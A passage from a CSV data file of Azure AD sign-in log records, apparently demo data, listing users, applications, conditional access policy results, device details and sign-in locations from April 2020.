API,42ec543f-db91-4d87-b07f-74fd67f40a00,SigninLogs,Sucess,50.6406517,5.572050095
+207,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6e90d619-f4d9-4f64-ad44-392b85a37cd3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e82050b8-a2c4-426d-8c05-8f1dda290800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e82050b8-a2c4-426d-8c05-8f1dda290800,SigninLogs,Sucess,13,105
+208,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,daed9055-fbab-46c2-a243-813fdcc6e8cc,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4c926580-a7d1-4f3d-971f-7f0b04660d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4c926580-a7d1-4f3d-971f-7f0b04660d00,SigninLogs,Sucess,41.90428925,-85.99833679
+209,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4351f994-5f8b-4935-a539-f78746cfcafc,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fbe5e30d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fbcf3a57-b92a-4bcf-a38d-09fbe5e30d00,SigninLogs,Sucess,41.90428925,-85.99833679
+210,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7310f976-b66c-44b4-9c11-e3ef73e2a492,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:26,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'isCompliant': True, 'trustType': 'Azure AD joined', 'isManaged': True}",5fb3911e-4ad1-4368-88ca-ea08a4653e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5fb3911e-4ad1-4368-88ca-ea08a4653e00,SigninLogs,Sucess,38.47222137,-77.41989899
+211,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,321af653-08ac-4a75-a07d-8cf7bf778220,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f43e6c92-66fa-4147-92cb-4f3b71bf0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f43e6c92-66fa-4147-92cb-4f3b71bf0d00,SigninLogs,Sucess,50.6406517,5.572050095
+212,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d8e9c81900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c27bb27f-6b5f-4aa7-85e4-b0d8e9c81900,SigninLogs,Sucess,50.6406517,5.572050095
+213,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:10.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c17fff8f-7624-4d35-b4a9-f73a10cfe659,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d86051b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,93d60bd4-ad49-40a5-9c6c-157d86051b00,SigninLogs,Sucess,50.6406517,5.572050095
+214,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:48.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0124ed77-1d94-441f-8e25-07f734a5aaed,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:18,"{'operatingSystem': 'Windows 10', 'deviceId': 